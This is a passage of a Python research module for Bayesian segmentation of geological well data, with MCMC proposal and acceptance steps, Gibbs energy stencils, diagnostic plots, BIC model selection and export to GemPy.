self.mus[-1], self.covs[-1])\n                log_target_prev = lmd_prev + lp_beta_prev\n                log_target_prop = lmd_prop + lp_beta_prop\n\n                beta_eval = evaluate(log_target_prop, log_target_prev)\n                if beta_eval[0]:\n                    self.betas_gp.append(beta_prop_gp)\n                else:\n                    self.betas_gp.append(self.betas_gp[-1])\n                self.beta_gp_acc_ratio = np.append(self.beta_gp_acc_ratio, beta_eval[1])  # store\n\n        else:\n            self.betas.append(self.betas[-1])\n            self.betas_gp.append(self.betas_gp[-1])\n        # ************************************************************************************************\n        # **********************************************************\n\n    def log_prior_density_mu(self, mu, label):\n        """Calculates the summed log prior density for a given mean and labels array."""\n        with np.errstate(divide='ignore'):\n            return np.sum(np.log(self.priors_mu[label].pdf(mu)))\n\n    def log_prior_density_beta(self, beta, dim=1):\n        """Calculates the log prior density for a given beta array."""\n        if dim == 1:\n            return np.log(self.prior_beta.pdf(beta))\n        else:\n            return np.log(self.prior_beta_gp.pdf(beta))\n
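\n    # Descriptive note (editor): the covariance prior below uses a separation\n    # strategy -- each covariance matrix is decomposed into standard deviations\n    # lam and a correlation matrix r; logp_r scores the correlation structure\n    # (with degrees-of-freedom parameter self.nu) and logp_lam places a\n    # log-normal prior (mean self.b_sigma, covariance self.kesi) on lam.\n    def log_prior_density_cov(self, cov, l):\n        """Calculates the summed log prior density for the given covariance matrix and labels array."""\n        lam = np.sqrt(np.diag(cov[l, :, :]))\n        r = np.diag(1. / lam) @ cov[l, :, :] @ np.diag(1. / lam)\n        logp_r = -0.5 * (self.nu + self.n_feat + 1) * np.log(np.linalg.det(r)) - self.nu / 2. 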
* np.sum(\n np.log(np.diag(np.linalg.inv(r))))\n logp_lam = np.sum(np.log(multivariate_normal(mean=self.b_sigma[l, :], cov=self.kesi[l, :]).pdf(np.log(lam.T))))\n return logp_r + logp_lam\n\n def propose_beta(self, beta_prev, beta_jump_length, dim = 1):\n \"\"\"Proposes a perturbed beta based on a jump length hyperparameter.\n\n Args:\n beta_prev:\n beta_jump_length:\n\n Returns:\n\n \"\"\"\n # create proposal covariance depending on physical dimensionality\n # dim = [1, 4, 13]\n if dim == 1:\n beta_dim = 1\n\n elif dim == 2:\n if self.stencil == \"4p\":\n beta_dim = 2\n elif self.stencil == \"8p\" or self.stencil is None:\n beta_dim = 4\n\n elif dim == 3:\n raise Exception(\"3D not yet supported.\")\n\n sigma_prop = np.eye(beta_dim) * beta_jump_length\n # draw from multivariate normal distribution and return\n # return np.exp(multivariate_normal(mean=np.log(beta_prev), cov=sigma_prop).rvs())\n return multivariate_normal(mean=beta_prev, cov=sigma_prop).rvs()\n\n def propose_mu(self, mu_prev, mu_jump_length):\n \"\"\"Proposes a perturbed mu matrix using a jump length hyperparameter.\n\n Args:\n mu_prev (:obj:`np.ndarray`): Previous mean array for all labels and features\n mu_jump_length (float or int): Hyperparameter specifying the jump length for the new proposal mean array.\n\n Returns:\n :obj:`np.ndarray`: The newly proposed mean array.\n\n \"\"\"\n # prepare matrix\n mu_prop = np.ones((self.n_labels, self.n_feat))\n # loop over labels\n for l in range(self.n_labels):\n mu_prop[l, :] = multivariate_normal(mean=mu_prev[l, :], cov=np.eye(self.n_feat) * mu_jump_length).rvs()\n return mu_prop\n\n def calc_sum_log_mixture_density(self, comp_coef, mu, cov):\n \"\"\"Calculate sum of log mixture density with each observation at every element.\n\n Args:\n comp_coef (:obj:`np.ndarray`): Component coefficient for each element (row) and label (column).\n mu (:obj:`np.ndarray`): Mean value array for all labels and features.\n cov (:obj:`np.ndarray`): Covariance matrix.\n\n Returns:\n float: Summed log mixture density.\n\n \"\"\"\n lmd = np.zeros((self.phys_shp.prod(), self.n_labels))\n\n for l in range(self.n_labels):\n draw = multivariate_normal(mean=mu[l, :], cov=cov[l, :, :]).pdf(self.feat)\n # print(np.shape(lmd[:,l]))\n multi = comp_coef[:, l] * np.array([draw])\n lmd[:, l] = multi\n lmd = np.sum(lmd, axis=1)\n with np.errstate(divide='ignore'):\n lmd = np.log(lmd)\n\n return np.sum(lmd)\n\n def calc_energy_like(self, mu, cov):\n \"\"\"Calculates the energy likelihood for a given mean array and covariance matrix for the entire domain.\n\n Args:\n mu (:obj:`np.ndarray`):\n cov (:obj:`np.ndarray`):\n vect (bool, optional): Toggles the vectorized implementation. 
False activates the loop-based version if\n you really dig a loss of speed of about 350 times.\n\n Returns:\n :obj:`np.ndarray` : Energy likelihood for each label at each element.\n \"\"\"\n energy_like_labels = np.zeros((self.phys_shp.prod(), self.n_labels))\n\n # uses flattened features array\n for l in range(self.n_labels):\n energy_like_labels[:, l] = np.einsum(\"...i,ji,...j\",\n 0.5 * np.array([self.feat.values - mu[l, :]]),\n np.linalg.inv(cov[l, :, :]),\n np.array([self.feat.values - mu[l, :]])) + 0.5 * np.log(\n np.linalg.det(cov[l, :, :]))\n\n return energy_like_labels\n\n def _calc_gibbs_energy_vect(self, labels, beta, dim, verbose=False):\n \"\"\"Calculates the Gibbs energy for each element using the penalty factor(s) beta.\n\n Args:\n labels (:obj:`np.ndarray`):\n beta (:obj:`np.array` of float):\n verbose (bool):\n\n Returns:\n :obj:`np.ndarray` : Gibbs energy at every element for each label.\n \"\"\"\n # ************************************************************************************************\n # 1D\n\n if dim == 1:\n # tile\n lt = np.tile(labels, (self.n_labels, 1)).T\n\n ge = np.arange(self.n_labels) # elements x labels\n ge = np.tile(ge, (len(labels), 1)).astype(float)\n\n # first row\n top = [np.not_equal(np.arange(self.n_labels), lt[1, :]) * beta]\n # mid\n mid = (np.not_equal(ge[1:-1, :], lt[:-2, :]).astype(float) + np.not_equal(ge[1:-1, :], lt[2:, :]).astype(\n float)) * beta\n # last row\n bot = [np.not_equal(np.arange(self.n_labels), lt[-2, :]) * beta]\n # put back together and return gibbs energy\n return np.concatenate((top, mid, bot))\n\n # ************************************************************************************************\n # 2D\n elif dim == 2:\n\n # TODO: Reshape according points that are insert\n # reshape the labels to 2D for \"stencil-application\"\n labels = labels.reshape(self.gp_resolution, self.gp_resolution) # self.shape[0], self.shape[1])\n\n # prepare gibbs energy array (filled with zeros)\n ge = np.tile(np.zeros_like(labels).astype(float), (self.n_labels, 1, 1))\n\n # create comparison array containing the different labels\n comp = np.tile(np.zeros_like(labels), (self.n_labels, 1, 1)).astype(float)\n for i in range(self.n_labels):\n comp[i, :, :] = i\n\n # anisotropic beta directions\n # 3 1 2\n # \\ | /\n # --+-- 0\n # / | \\\n\n # **********************************************************************************************************\n # direction 0 = 0° polar coord system\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, 1:-1]).astype(\n float) # compare with left\n + np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, 1:-1]).astype(float)) * beta[0]\n # compare with right\n\n # left column\n # right\n ge[:, :, 0] += np.not_equal(comp[:, :, 0], labels[:, 1]).astype(float) * beta[0]\n # right column\n # left\n ge[:, :, -1] += np.not_equal(comp[:, :, -1], labels[:, -2]).astype(float) * beta[0]\n # top row\n # right\n ge[:, 0, :-1] += np.not_equal(comp[:, 0, :-1], labels[0, 1:]).astype(float) * beta[0]\n # left\n ge[:, 0, 1:] += np.not_equal(comp[:, 0, 1:], labels[0, :-1]).astype(float) * beta[0]\n # bottom row\n # right\n ge[:, -1, :-1] += np.not_equal(comp[:, -1, :-1], labels[-1, 1:]).astype(float) * beta[0]\n # left\n ge[:, -1, 1:] += np.not_equal(comp[:, -1, 1:], labels[-1, :-1]).astype(float) * beta[0]\n\n # **********************************************************************************************************\n # direction 1 = 90° polar coord system\n ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], 
labels[1:-1, :-2]).astype(float)  # compare with above\n                                  + np.not_equal(comp[:, 1:-1, 1:-1], labels[1:-1, 2:]).astype(float)) * beta[1]  # compare with below\n            # left column\n            # above\n            ge[:, 1:, 0] += np.not_equal(comp[:, 1:, 0], labels[:-1, 0]).astype(float) * beta[1]\n            # below\n            ge[:, :-1, 0] += np.not_equal(comp[:, :-1, 0], labels[1:, 0]).astype(float) * beta[1]\n            # right column\n            # above\n            ge[:, 1:, -1] += np.not_equal(comp[:, 1:, -1], labels[:-1, -1]).astype(float) * beta[1]\n            # below\n            ge[:, :-1, -1] += np.not_equal(comp[:, :-1, -1], labels[1:, -1]).astype(float) * beta[1]\n            # top row\n            # below\n            ge[:, 0, :] += np.not_equal(comp[:, 0, :], labels[1, :]).astype(float) * beta[1]\n            # bottom row\n            # above\n            ge[:, -1, :] += np.not_equal(comp[:, -1, :], labels[-2, :]).astype(float) * beta[1]\n\n            # **********************************************************************************************************\n            # direction 2 = 45° polar coord system\n            if self.stencil == "8p":\n                ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, :-2]).astype(float)  # compare with right up\n                                      + np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, 2:]).astype(float)) * beta[2]  # compare with left down\n                # left column\n                # right up\n                ge[:, 1:, 0] += np.not_equal(comp[:, 1:, 0], labels[:-1, 1]).astype(float) * beta[2]\n                # right column\n                # left down\n                ge[:, :-1, -1] += np.not_equal(comp[:, :-1, -1], labels[1:, -2]).astype(float) * beta[2]\n                # top row\n                # below left\n                ge[:, 0, 1:] += np.not_equal(comp[:, 0, 1:], labels[1, :-1]).astype(float) * beta[2]\n                # bottom row\n                # above right\n                ge[:, -1, :-1] += np.not_equal(comp[:, -1, :-1], labels[-2, 1:]).astype(float) * beta[2]\n            # **********************************************************************************************************\n            # direction 3 = 135° polar coord system\n            if self.stencil == "8p":\n                ge[:, 1:-1, 1:-1] += (np.not_equal(comp[:, 1:-1, 1:-1], labels[:-2, :-2]).astype(float)  # compare with left up\n                                      + np.not_equal(comp[:, 1:-1, 1:-1], labels[2:, 2:]).astype(float)) * beta[3]  # compare with right down\n                # left column\n                # right down\n                ge[:, :-1, 0] += np.not_equal(comp[:, :-1, 0], labels[1:, 1]).astype(float) * beta[3]\n                # right column\n                # left up\n                ge[:, 1:, -1] += np.not_equal(comp[:, 1:, -1], labels[:-1, -2]).astype(float) * beta[3]\n                # top row\n                # below right\n                ge[:, 0, :-1] += np.not_equal(comp[:, 0, :-1], labels[1, 1:]).astype(float) * beta[3]\n                # bottom row\n                # above left\n                ge[:, -1, 1:] += np.not_equal(comp[:, -1, 1:], labels[-2, :-1]).astype(float) * beta[3]\n\n            # **********************************************************************************************************\n            # overwrite corners\n            # up left\n            ge[:, 0, 0] = np.not_equal(comp[:, 0, 0], labels[1, 0]).astype(float) * beta[1] \\\n                          + np.not_equal(comp[:, 0, 0], labels[0, 1]).astype(float) * beta[0]\n            if self.stencil == "8p":\n                ge[:, 0, 0] += np.not_equal(comp[:, 0, 0], labels[1, 1]).astype(float) * beta[3]\n\n            # low left\n            ge[:, -1, 0] = np.not_equal(comp[:, -1, 0], labels[-1, 1]).astype(float) * beta[0] \\\n                           + np.not_equal(comp[:, -1, 0], labels[-2, 0]).astype(float) * beta[1]\n            if self.stencil == "8p":\n                ge[:, -1, 0] += np.not_equal(comp[:, -1, 0], labels[-2, 1]).astype(float) * beta[2]\n\n            # up right\n            ge[:, 0, -1] = np.not_equal(comp[:, 0, -1], labels[1, -1]).astype(float) * beta[1] \\\n                           + np.not_equal(comp[:, 0, -1], labels[0, -2]).astype(float) * beta[0]\n            if self.stencil == "8p":\n                ge[:, 0, -1] += np.not_equal(comp[:, 0, -1], labels[1, -2]).astype(float) * beta[2]\n
\n            # low right\n            ge[:, -1, -1] = np.not_equal(comp[:, -1, -1], labels[-2, -1]).astype(float) * beta[1] \\\n                            + np.not_equal(comp[:, -1, -1], labels[-1, -2]).astype(float) * beta[0]\n            if self.stencil == "8p":\n                ge[:, -1, -1] += np.not_equal(comp[:, -1, -1], labels[-2, -2]).astype(float) * beta[3]\n\n            # reshape and transpose gibbs energy, return\n            return np.array([ge[l, :, :].ravel() for l in range(self.n_labels)]).T\n\n        # ************************************************************************************************\n        elif dim == 3:\n            # TODO: [3D] implementation of gibbs energy\n            raise Exception("3D not yet implemented.")\n\n    def mcr(self, true_labels):\n        """Compares classified with true labels for each iteration step (for synthetic data) to obtain a measure of\n        mismatch/convergence."""\n        mcr_vals = []\n        n = len(true_labels)\n        # TODO: [2D] implementation for MCR\n        # TODO: [3D] implementation for MCR\n        for label in self.labels:\n            misclassified = np.count_nonzero(true_labels - label)\n            mcr_vals.append(misclassified / n)\n        return mcr_vals\n\n    def get_std_from_cov(self, f, l):\n        """\n        Extracts standard deviation from covariance matrices for feature f and label l.\n        :param f: feature (int)\n        :param l: label (int)\n        :return: standard deviations from all covariance matrices for the label/feature combination\n        """\n        stds = []\n        for i in range(len(self.covs)):\n            stds.append(np.sqrt(np.diag(self.covs[i][l])[f]))\n        return stds\n\n    def get_corr_coef_from_cov(self, l):\n        """\n        Extracts the correlation coefficient from the covariance matrix for label l.\n        :param l: label (int)\n        :return: correlation coefficients from all covariance matrices for the given label.\n        """\n        corr_coefs = []\n        for i in range(len(self.covs)):\n            corr_coef = self.covs[i][l, 0, 1]\n            for f in [0, 1]:\n                corr_coef = corr_coef / np.sqrt(np.diag(self.covs[i][l])[f])\n            corr_coefs.append(corr_coef)\n        return corr_coefs\n\n    def plot_mu_stdev(self):\n        """Plot mean and standard deviation over all iterations."""\n        fig, ax = plt.subplots(nrows=self.n_feat, ncols=2, figsize=(15, 5 * self.n_feat))\n\n        ax[0, 0].set_title(r"$\mu$")\n        ax[0, 1].set_title(r"$\sigma$")\n\n        for f in range(self.n_feat):\n            for l in range(self.n_labels):\n                if np.mean(np.array(self.mus)[:, :, f][:, l]) == -9999:\n                    continue\n                else:\n                    ax[f, 0].plot(np.array(self.mus)[:, :, f][:, l], label="Label " + str(l))\n\n            ax[f, 0].set_ylabel("Feature " + str(f))\n\n            for l in range(self.n_labels):\n                ax[f, 1].plot(self.get_std_from_cov(f, l), label="Label " + str(l))\n\n            ax[f, 0].set_xlabel("Iterations")\n            ax[f, 1].set_xlabel("Iterations")\n            ax[f, 1].legend(loc=9, bbox_to_anchor=(0.5, -0.25), ncol=3)\n\n        plt.show()\n\n    def plot_acc_ratios(self, linewidth=1):\n        """Plot acceptance ratios for beta, mu and covariance."""\n        fig, ax = plt.subplots(ncols=3, figsize=(15, 4))\n\n        ax[0].set_title(r"$\beta$")\n        ax[0].plot(self.beta_acc_ratio, linewidth=linewidth, color="black")\n\n        ax[1].set_title(r"$\mu$")\n        ax[1].plot(self.mu_acc_ratio, linewidth=linewidth, color="red")\n\n        ax[2].set_title("Covariance")\n        ax[2].plot(self.cov_acc_ratio, linewidth=linewidth, color="indigo")\n\n    def diagnostics_plot(self, true_labels=None, ie_range=None, transpose=False):\n        """Diagnostic plots for analyzing convergence and segmentation results.\n\n        Args:\n            true_labels (:obj:`np.ndarray`):\n            ie_range (:obj:`tuple` or :obj:`list`): Start and end point of the iteration slice used in the calculation\n                of the information entropy.\n\n        Returns:\n            Plot\n        """\n
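        # Layout (editor's descriptive note): row 0 always shows the beta trace\n        # and the per-label correlation coefficients; in 1D the label history,\n        # latent field and MCR follow, while in 2D the MAP labels (labels_map)\n        # and the information entropy of the chain (compute_ie) are shown.\n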
        if true_labels is not None:\n            fig = plt.figure(figsize=(15, 10))\n            gs = gridspec.GridSpec(4, 2)\n        else:\n            fig = plt.figure(figsize=(15, 10))\n            gs = gridspec.GridSpec(2, 2)\n\n        rcParams.update({'font.size': 8})\n\n        # plot beta\n        ax1 = plt.subplot(gs[0, :-1])\n        ax1.set_title(r"$\beta$")\n\n        betas = np.array(self.betas)\n        if self.dim == 1:\n            ax1.plot(betas, label="beta", linewidth=1)\n        else:\n            for b in range(betas.shape[1]):\n                ax1.plot(betas[:, b], label="beta " + str(b), linewidth=1)\n\n        ax1.set_xlabel("Iterations")\n        ax1.legend()\n\n        # plot correlation coefficient\n        ax2 = plt.subplot(gs[0, -1])\n        ax2.set_title("Correlation coefficient")\n        for l in range(self.n_labels):\n            ax2.plot(self.get_corr_coef_from_cov(l), label="Label " + str(l), linewidth=1)\n        ax2.legend()\n        ax2.set_xlabel("Iterations")\n\n        # 1D\n        if self.dim == 1:\n            # PLOT LABELS\n            ax3 = plt.subplot(gs[1, :])\n            ax3.imshow(np.array(self.labels), cmap=cmap, norm=cmap_norm, aspect='auto', interpolation='nearest')\n            ax3.set_ylabel("Iterations")\n            ax3.set_title("Labels")\n            ax3.grid(False)  # disable grid\n\n            if true_labels is not None:\n                # plot the latent field\n                ax4 = plt.subplot(gs[2, :])\n                ax4.imshow(np.tile(np.expand_dims(true_labels, axis=1), 50).T,\n                           cmap=cmap, norm=cmap_norm, aspect='auto', interpolation='nearest')\n                ax4.set_title("Latent field")\n                ax4.grid(False)\n\n                # plot the mcr\n                ax5 = plt.subplot(gs[3, :])\n                ax5.plot(self.mcr(true_labels), color="black", linewidth=1)\n                ax5.set_ylabel("MCR")\n                ax5.set_xlabel("Iterations")\n\n        # 2D\n        elif self.dim == 2:\n            if ie_range is None:  # use all iterations\n                a = 0\n                b = -1\n            else:  # use the given range\n                a = ie_range[0]\n                b = ie_range[1]\n\n            max_lp = labels_map(self.labels, r=(a, b))\n\n            # PLOT LABELS\n            ax3 = plt.subplot(gs[1, 0])\n            ax3.set_title("Labels (MAP)")\n            if transpose:\n                max_lp_plot = np.array(max_lp.reshape(self.shape[0], self.shape[1])).T\n            else:\n                max_lp_plot = np.array(max_lp.reshape(self.shape[0], self.shape[1]))\n            ax3.imshow(max_lp_plot, cmap=cmap, norm=cmap_norm, interpolation='nearest')\n            ax3.grid(False)\n\n            # PLOT INFORMATION ENTROPY\n            ie = compute_ie(compute_labels_prob(np.array(self.labels[a:b])))  # calculate ie\n            ax4 = plt.subplot(gs[1, 1])\n            ax4.set_title("Information Entropy")\n            if transpose:\n                ie_plot = ie.reshape(self.shape[0], self.shape[1]).T\n            else:\n                ie_plot = ie.reshape(self.shape[0], self.shape[1])\n            iep = ax4.imshow(ie_plot, cmap="viridis", interpolation='nearest')\n            ax4.grid(False)\n            plt.colorbar(iep)\n\n        plt.show()\n\n    def nearest_points(self, layer):\n        lst = self.geo_data.interfaces.loc[np.where(self.geo_data.interfaces.formation_number == layer)[0]]\n        lst = lst.reset_index(drop=True)\n\n        # store points pairwise with their x and y coordinates\n        points = []\n        for k in range(len(lst)):\n            points.append((lst.loc[k, 'X'], lst.loc[k, 'Y']))\n\n        # calculate pairwise distances and store them with the corresponding point indices\n        distances = []\n        pos = []\n        for i in range(len(points) - 1):\n            for j in range(i + 1, len(points)):\n                distances += [euclideanDistance(points[i], points[j])]  # stores distances between two points\n                pos += [[i, j]]  # stores corresponding points\n\n        # pair of points with the smallest distance\n        final_points = pos[np.where(distances == min(distances))[0][0]]\n\n        X = (lst.X.loc[final_points[0]] + lst.X.loc[final_points[1]]) / 2\n        Y = (lst.Y.loc[final_points[0]] + lst.Y.loc[final_points[1]]) / 2\n\n        # append the mean point between the two nearest points\n        points.append((X, Y))\n\n        # calculate the distance between the mean point and all other values\n
        distances = []\n        pos = []\n        for i in range(len(points) - 1):\n            distances += [euclideanDistance(points[i], points[-1])]  # stores distances between two points\n            pos += [i]  # stores corresponding points\n\n        # third-nearest point to the mean point (the two nearest are the pair itself)\n        k = hq.nsmallest(3, distances)[2]\n        #m = hq.nsmallest(4, distances)[3]\n\n        # 3 nearest points in lst\n        final_points.append(np.where(distances == k)[0][0])\n        #final_points.append(np.where(distances == m)[0][0])\n\n        # match the selected points back to rows of geo_data.interfaces via the\n        # X+Y+Z+formation_number sums (a compact, if fragile, row fingerprint)\n        u = np.sum(lst.loc[final_points, ['X', 'Y', 'Z', 'formation_number']], axis=1).values\n        p = np.sum(self.geo_data.interfaces.loc[:, ['X', 'Y', 'Z', 'formation_number']], axis=1)\n        p = p.sort_index()\n\n        final_points2 = []\n        for i in range(len(u)):\n            final_points2.append(np.where(p == u[i])[0][0])\n\n        return final_points2\n\n    def normalize_feature_vectors(self):\n        return (self.feat - np.mean(self.feat, axis=0).T) / np.std(self.feat, axis=0)\n\n\ndef labels_map(labels, r=None):\n    if r is None:\n        r = (0, -1)\n\n    lp = compute_labels_prob(np.array(labels[r[0]:r[1]]))\n    return np.argmax(lp, axis=0)\n\n\ndef draw_labels_vect(labels_prob):\n    """Vectorized draw of the label for each element's respective labels probability.\n\n    Args:\n        labels_prob (:obj:`np.ndarray`): (n_elements x n_labels) ndarray containing the element-specific labels\n            probabilities for each element.\n\n    Returns:\n        :obj:`np.array` : Flat array containing the newly drawn labels for each element.\n\n    """\n    # draw a random number between 0 and 1 for each element\n    r = np.random.rand(len(labels_prob))\n    # cumsum labels probabilities for each element\n    p = np.cumsum(labels_prob, axis=1)\n    # calculate difference between random draw and cumsum probabilities\n    d = (p.T - r).T\n    # compare and count to get label\n    return np.count_nonzero(np.greater_equal(0, d), axis=1)\n\n\ndef evaluate(log_target_prop, log_target_prev):\n    # Metropolis acceptance: accept if the target ratio exceeds a uniform draw\n    # (np.longdouble guards against overflow; the old np.longfloat alias was\n    # removed from recent NumPy releases)\n    ratio = np.exp(np.longdouble(log_target_prop - log_target_prev))\n\n    if (ratio > 1) or (np.random.uniform() < ratio):\n        return True, ratio  # if accepted\n\n    else:\n        return False, ratio  # if rejected\n\n\ndef _propose_cov(cov_prev, n_feat, n_labels, cov_jump_length, theta_jump_length):\n    """Proposes a perturbed n-dimensional covariance matrix based on an existing one and a covariance jump length and\n    theta jump length parameter.\n\n    Args:\n        cov_prev (:obj:`np.ndarray`): Covariance matrix.\n        n_feat (int): Number of features.\n        n_labels (int): Number of labels.\n        cov_jump_length (float): Hyperparameter\n        theta_jump_length (float): Hyperparameter\n\n    Returns:\n        :obj:`np.ndarray` : Perturbed covariance matrix.\n\n    """\n    # do svd on the previous covariance matrix\n    comb = list(combinations(range(n_feat), 2))\n    n_comb = len(comb)\n    theta_jump = multivariate_normal(mean=[0 for i in range(n_comb)], cov=np.ones(n_comb) * theta_jump_length).rvs()\n\n    if n_comb == 1:  # turn it into a list if there is only one combination (^= 2 features)\n        theta_jump = [theta_jump]\n\n    cov_prop = np.zeros_like(cov_prev)\n\n    # loop over all labels (=layers of the covariance matrix)\n    for l in range(n_labels):\n        v_l, d_l, v_l_t = np.linalg.svd(cov_prev[l, :, :])\n        # generate d jump\n        log_d_jump = multivariate_normal(mean=[0 for i in range(n_feat)], cov=np.eye(n_feat) * cov_jump_length).rvs()\n        # sum towards d proposal\n        d_prop = np.diag(np.exp(np.log(d_l) + log_d_jump))\n        # now tackle generating v jump\n        a = np.eye(n_feat)\n
print(\"a init:\", a)\n # print(\"shape a:\", np.shape(a))\n for val in range(n_comb):\n rotation_matrix = _cov_proposal_rotation_matrix(v_l[:, comb[val][0]], v_l[:, comb[val][1]], theta_jump[val])\n # print(\"rot mat:\", rotation_matrix)\n a = rotation_matrix @ a\n # print(\"a:\", a)\n # print(\"v_l:\", np.shape(v_l))\n v_prop = a @ v_l # np.matmul(a, v_l)\n # print(\"d_prop:\", d_prop)\n # print(\"v_prop:\", np.shape(v_prop))\n cov_prop[l, :, :] = v_prop @ d_prop @ v_prop.T # np.matmul(np.matmul(v_prop, d_prop), v_prop.T)\n # print(\"cov_prop:\", cov_prop)\n\n return cov_prop\n\n\ndef _cov_proposal_rotation_matrix(x, y, theta):\n \"\"\"Creates the rotation matrix needed for the covariance matrix proposal step.\n\n Args:\n x (:obj:`np.array`): First base vector.\n y (:obj:`np.array`): Second base vector.\n theta (float): Rotation angle.\n\n Returns:\n :obj:`np.ndarray` : Rotation matrix for covariance proposal step.\n\n \"\"\"\n x = np.array([x]).T\n y = np.array([y]).T\n\n uu = x / np.linalg.norm(x)\n vv = y - uu.T @ y * uu\n vv = vv / np.linalg.norm(vv)\n # what is happening\n\n # rotation_matrix = np.eye(len(x)) - np.matmul(uu, uu.T) - np.matmul(np.matmul(vv, vv.T) + np.matmul(np.hstack((uu, vv)), np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])), np.hstack((uu, vv)).T)\n rotation_matrix = np.eye(len(x)) - uu @ uu.T - vv @ vv.T + np.hstack((uu, vv)) @ np.array(\n [[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]) @ np.hstack((uu, vv)).T\n return rotation_matrix\n\n\ndef _calc_labels_prob(te, t):\n \"\"\"\"Calculate labels probability for array of total energies (te) and totally arbitrary skalar value t.\"\"\"\n return (np.exp(-te / t).T / np.sum(np.exp(-te / t), axis=1)).T\n\n\ndef pseudocolor(shape, stencil=None):\n \"\"\"Graph coloring based on the physical dimensions for independent labels draw.\n\n Args:\n extent (:obj:`tuple` of int): Data extent in (Y), (Y,X) or (Y,X,Z) for 1D, 2D or 3D respectively.\n stencil:\n\n Returns:\n\n \"\"\"\n dim = len(shape) - 1\n # ************************************************************************************************\n # 1-DIMENSIONAL\n if dim == 1:\n i_w = np.arange(0, shape[0], step=2)\n i_b = np.arange(1, shape[0], step=2)\n\n return np.array([i_w, i_b]).T\n\n # ************************************************************************************************\n # 2-DIMENSIONAL\n elif dim == 2:\n if stencil is None or stencil == \"8p\":\n # use 8 stamp as default, resulting in 4 colors\n colors = 4\n # color image\n colored_image = np.tile(np.kron([[0, 1], [2, 3]] * int(shape[0] / 2), np.ones((1, 1))), int(shape[1] / 2))\n colored_flat = colored_image.reshape(shape[0] * shape[1])\n\n # initialize storage array\n ci = []\n for c in range(colors):\n x = np.where(colored_flat == c)[0]\n ci.append(x)\n return np.array(ci)\n\n elif stencil == \"4p\":\n # use 4 stamp, resulting in 2 colors (checkerboard)\n colors = 2\n # color image\n colored_image = np.tile(np.kron([[0, 1], [1, 0]] * int(shape[0] / 2), np.ones((1, 1))), int(shape[1] / 2))\n colored_flat = colored_image.reshape(shape[0] * shape[1])\n\n # initialize storage array\n ci = []\n for c in range(colors):\n x = np.where(colored_flat == c)[0]\n ci.append(x)\n return ci\n else:\n raise Exception(\" In 2D space the stamp parameter needs to be either None (defaults to 8p), 4p or 8p.\")\n\n # ************************************************************************************************\n # 3-DIMENSIONAL\n elif dim == 3:\n raise Exception(\"3D space 
not yet supported.\")\n # TODO: 3d graph coloring\n\n\ndef bic(feat_vector, n_labels, plot):\n \"\"\"Plots the Bayesian Information Criterion of Gaussian Mixture Models for the given features and range of labels\n defined by the given upper boundary.\n\n Args:\n feat_vector (:obj:`np.ndarray`): Feature vector containing the data in a flattened format.\n n_labels (int): Sets the included upper bound for the number of features to be considered in the analysis.\n\n Returns:\n Plot\n\n \"\"\"\n n_comp = np.arange(1, n_labels + 1)\n # create array of GMMs in range of components/labels and fit to observations\n gmms = np.array([mixture.GaussianMixture(n_components=n, covariance_type=\"full\").fit(feat_vector) for n in n_comp])\n # calculate BIC for each GMM based on observartions\n bics = np.array([gmm.bic(feat_vector) for gmm in gmms])\n # take sequential difference\n # bic_diffs = np.ediff1d(bics)\n\n # find index of minimum BIC\n # bic_min = np.argmin(bics)\n # bic_diffs_min = np.argmin(np.abs(bic_diffs))\n\n # d = np.abs(bic_diffs[bic_diffs_min] * d_factor)\n bic_min = np.argmin(bics)\n\n # do a nice plot so the user knows intuitively whats happening\n if plot == True:\n fig = plt.figure() # figsize=(10, 10)\n plt.plot(n_comp, bics, label=\"bic\")\n plt.plot(n_comp[bic_min], bics[bic_min], \"ko\")\n plt.title(\"Bayesian Information Criterion\")\n plt.xlabel(\"Number of Labels\")\n plt.axvline(n_comp[bic_min], color=\"black\", linestyle=\"dashed\", linewidth=0.75)\n plt.show()\n\n print(\"global minimum: \", n_comp[bic_min])\n return n_comp[bic_min]\n\n\ndef gibbs_comp_f(a, value):\n \"\"\"Helper function for the Gibbs energy calculation using Scipy's generic filter function.\"\"\"\n a = a[a != -999.]\n return np.count_nonzero(a != value)\n\n\ndef prepare_gempy_input(input_data, result_data):\n \"\"\"Prepares the data for the input in Gempy and puts out a csv-file including the data\"\"\"\n # data convertion to gempy\n\n gempy = pd.DataFrame({'X': input_data.X, 'Y': input_data.Y, 'Z': input_data.Z, 'formation': result_data,\n 'borehole': input_data['Well Name']})\n\n for k in range(0, len(gempy) - 1):\n if gempy.loc[k, 'formation'] == gempy.loc[k + 1, 'formation']:\n gempy = gempy.drop(k)\n\n gempy.index = range(len(gempy))\n\n for k in range(0, 1 + len(set(list(gempy['formation'])))):\n gempy['formation'] = gempy['formation'].replace(to_replace=k, value='Layer%d' % (k))\n\n for k in range(0, 1 + len(set(list(gempy['formation'])))):\n gempy['formation'] = gempy['formation'].replace(to_replace=k, value='Layer%d' % (k))\n\n gempy.to_csv('../data/Gempy_Simple_4_layer_90degrees.csv', index=False)\n\n\ndef normalize_feature_vectors(self):\n return (self - np.mean(self, axis=0).T) / np.std(self, axis=0)\n\n\ndef test_bic(feature_vectors_norm,n):\n # Bayesian information criteria\n nft = []\n for k in range(2, n):\n nft.append(bic(feature_vectors_norm, k,\n plot=False)) # Investigate the number of labels (one label can include several cluster)\n nf = max(set(nft), key=nft.count) # put out the most common value in bic\n print('The optimal number of layers is: ', nf)\n return nf, nft\n\ndef euclideanDistance(coordinate1, coordinate2):\n return pow(pow(coordinate1[0] - coordinate2[0], 2) + pow(coordinate1[1] - coordinate2[1], 2), .5)", "repo_name": "cgre-aachen/MSc_theses", "sub_path": "Well_analysis_BaySeg_GemPy_coupled/bayseg/bayseg.py", "file_name": "bayseg.py", "file_ext": "py", "file_size_in_byte": 68449, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": 
